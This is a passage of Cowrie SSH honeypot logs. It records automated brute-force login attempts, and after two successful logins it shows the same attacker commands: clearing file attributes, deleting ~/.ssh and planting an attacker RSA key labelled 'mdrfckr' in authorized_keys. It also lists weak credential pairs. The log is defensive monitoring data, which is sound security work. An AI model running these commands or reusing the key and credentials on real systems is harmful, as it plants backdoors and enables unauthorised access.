03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T20:04:00.926794Z","src_ip":"77.75.56.63","session":"637b6dea37b2"}
{"eventid":"cowrie.login.success","username":"root","password":"w3LC0M31","message":"login attempt [root/w3LC0M31] succeeded","sensor":"my-vps","timestamp":"2025-09-08T20:04:01.120830Z","src_ip":"77.75.56.63","session":"637b6dea37b2"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T20:04:01.225899Z","src_ip":"77.75.56.63","session":"637b6dea37b2"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T20:04:01.226835Z","src_ip":"77.75.56.63","session":"637b6dea37b2"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T20:04:01.228036Z","src_ip":"77.75.56.63","session":"637b6dea37b2"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T20:04:01.266876Z","src_ip":"77.75.56.63","session":"637b6dea37b2"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T20:04:01.453711Z","src_ip":"77.75.56.63","session":"637b6dea37b2"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T20:04:01.454439Z","src_ip":"77.75.56.63","session":"637b6dea37b2"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T20:04:01.492532Z","src_ip":"77.75.56.63","session":"637b6dea37b2"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T20:04:01.493699Z","src_ip":"77.75.56.63","session":"637b6dea37b2"}
{"eventid":"cowrie.session.connect","src_ip":"77.75.56.63","src_port":48930,"dst_ip":"1.2.3.4","dst_port":22,"session":"09d0069fa025","protocol":"ssh","message":"New connection: 77.75.56.63:48930 (1.2.3.4:22) [session: 09d0069fa025]","sensor":"my-vps","timestamp":"2025-09-08T20:04:01.528044Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T20:04:01.528945Z","src_ip":"77.75.56.63","session":"09d0069fa025"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T20:04:01.569531Z","src_ip":"77.75.56.63","session":"09d0069fa025"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":51500,"dst_ip":"1.2.3.4","dst_port":22,"session":"1ef9fda78e17","protocol":"ssh","message":"New connection: 217.72.205.35:51500 (1.2.3.4:22) [session: 1ef9fda78e17]","sensor":"my-vps","timestamp":"2025-09-08T20:04:01.618994Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T20:04:01.620793Z","src_ip":"217.72.205.35","session":"1ef9fda78e17"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T20:04:01.762991Z","src_ip":"77.75.56.63","session":"09d0069fa025"}
{"eventid":"cowrie.session.connect","src_ip":"103.206.72.2","src_port":40858,"dst_ip":"1.2.3.4","dst_port":22,"session":"ea98ff9fcd3c","protocol":"ssh","message":"New connection: 103.206.72.2:40858 (1.2.3.4:22) [session: ea98ff9fcd3c]","sensor":"my-vps","timestamp":"2025-09-08T20:04:01.764328Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T20:04:01.766642Z","src_ip":"103.206.72.2","session":"ea98ff9fcd3c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T20:04:01.944073Z","src_ip":"103.206.72.2","session":"ea98ff9fcd3c"}
{"eventid":"cowrie.login.failed","username":"jack","password":"Password","message":"login attempt [jack/Password] failed","sensor":"my-vps","timestamp":"2025-09-08T20:04:02.660880Z","src_ip":"103.206.72.2","session":"ea98ff9fcd3c"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T20:04:02.801980Z","src_ip":"77.75.56.63","session":"09d0069fa025"}
{"eventid":"cowrie.session.connect","src_ip":"77.75.56.63","src_port":48932,"dst_ip":"1.2.3.4","dst_port":22,"session":"a2815a45f694","protocol":"ssh","message":"New connection: 77.75.56.63:48932 (1.2.3.4:22) [session: a2815a45f694]","sensor":"my-vps","timestamp":"2025-09-08T20:04:02.838673Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T20:04:02.839334Z","src_ip":"77.75.56.63","session":"a2815a45f694"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T20:04:02.876521Z","src_ip":"77.75.56.63","session":"a2815a45f694"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T20:04:03.062777Z","src_ip":"77.75.56.63","session":"a2815a45f694"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T20:04:03.100617Z","src_ip":"77.75.56.63","session":"637b6dea37b2"}
{"eventid":"cowrie.session.closed","duration":"0.3","message":"Connection lost after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T20:04:03.101686Z","src_ip":"77.75.56.63","session":"a2815a45f694"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T20:04:03.845821Z","src_ip":"103.206.72.2","session":"ea98ff9fcd3c"}
{"eventid":"cowrie.session.connect","src_ip":"14.103.117.69","src_port":50484,"dst_ip":"1.2.3.4","dst_port":22,"session":"4ee031b75f00","protocol":"ssh","message":"New connection: 14.103.117.69:50484 (1.2.3.4:22) [session: 4ee031b75f00]","sensor":"my-vps","timestamp":"2025-09-08T20:04:48.287520Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T20:04:48.289354Z","src_ip":"14.103.117.69","session":"4ee031b75f00"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T20:04:48.487592Z","src_ip":"14.103.117.69","session":"4ee031b75f00"}
{"eventid":"cowrie.login.failed","username":"jack","password":"Password","message":"login attempt [jack/Password] failed","sensor":"my-vps","timestamp":"2025-09-08T20:04:49.804128Z","src_ip":"14.103.117.69","session":"4ee031b75f00"}
{"eventid":"cowrie.session.closed","duration":"3.2","message":"Connection lost after 3.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T20:04:51.464099Z","src_ip":"14.103.117.69","session":"4ee031b75f00"}
{"eventid":"cowrie.session.connect","src_ip":"77.75.56.63","src_port":57066,"dst_ip":"1.2.3.4","dst_port":22,"session":"e9ba0f19dba2","protocol":"ssh","message":"New connection: 77.75.56.63:57066 (1.2.3.4:22) [session: e9ba0f19dba2]","sensor":"my-vps","timestamp":"2025-09-08T20:05:08.639020Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T20:05:08.642899Z","src_ip":"77.75.56.63","session":"e9ba0f19dba2"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T20:05:08.680036Z","src_ip":"77.75.56.63","session":"e9ba0f19dba2"}
{"eventid":"cowrie.login.failed","username":"phpmyadmin","password":"!","message":"login attempt [phpmyadmin/!] failed","sensor":"my-vps","timestamp":"2025-09-08T20:05:08.877888Z","src_ip":"77.75.56.63","session":"e9ba0f19dba2"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T20:05:09.916599Z","src_ip":"77.75.56.63","session":"e9ba0f19dba2"}
{"eventid":"cowrie.session.connect","src_ip":"103.206.72.2","src_port":34234,"dst_ip":"1.2.3.4","dst_port":22,"session":"5588dd63adad","protocol":"ssh","message":"New connection: 103.206.72.2:34234 (1.2.3.4:22) [session: 5588dd63adad]","sensor":"my-vps","timestamp":"2025-09-08T20:05:23.008514Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T20:05:23.014171Z","src_ip":"103.206.72.2","session":"5588dd63adad"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T20:05:23.185463Z","src_ip":"103.206.72.2","session":"5588dd63adad"}
{"eventid":"cowrie.login.success","username":"root","password":"hello@1234","message":"login attempt [root/hello@1234] succeeded","sensor":"my-vps","timestamp":"2025-09-08T20:05:23.878164Z","src_ip":"103.206.72.2","session":"5588dd63adad"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T20:05:24.285106Z","src_ip":"103.206.72.2","session":"5588dd63adad"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T20:05:24.285867Z","src_ip":"103.206.72.2","session":"5588dd63adad"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T20:05:24.287000Z","src_ip":"103.206.72.2","session":"5588dd63adad"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T20:05:24.461201Z","src_ip":"103.206.72.2","session":"5588dd63adad"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T20:05:24.823149Z","src_ip":"103.206.72.2","session":"5588dd63adad"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T20:05:24.823837Z","src_ip":"103.206.72.2","session":"5588dd63adad"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T20:05:24.999583Z","src_ip":"103.206.72.2","session":"5588dd63adad"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T20:05:25.000435Z","src_ip":"103.206.72.2","session":"5588dd63adad"}
{"eventid":"cowrie.session.connect","src_ip":"103.206.72.2","src_port":34344,"dst_ip":"1.2.3.4","dst_port":22,"session":"0a1047207feb","protocol":"ssh","message":"New connection: 103.206.72.2:34344 (1.2.3.4:22) [session: 0a1047207feb]","sensor":"my-vps","timestamp":"2025-09-08T20:05:25.169593Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T20:05:25.173166Z","src_ip":"103.206.72.2","session":"0a1047207feb"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T20:05:25.347415Z","src_ip":"103.206.72.2","session":"0a1047207feb"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T20:05:26.040091Z","src_ip":"103.206.72.2","session":"0a1047207feb"}
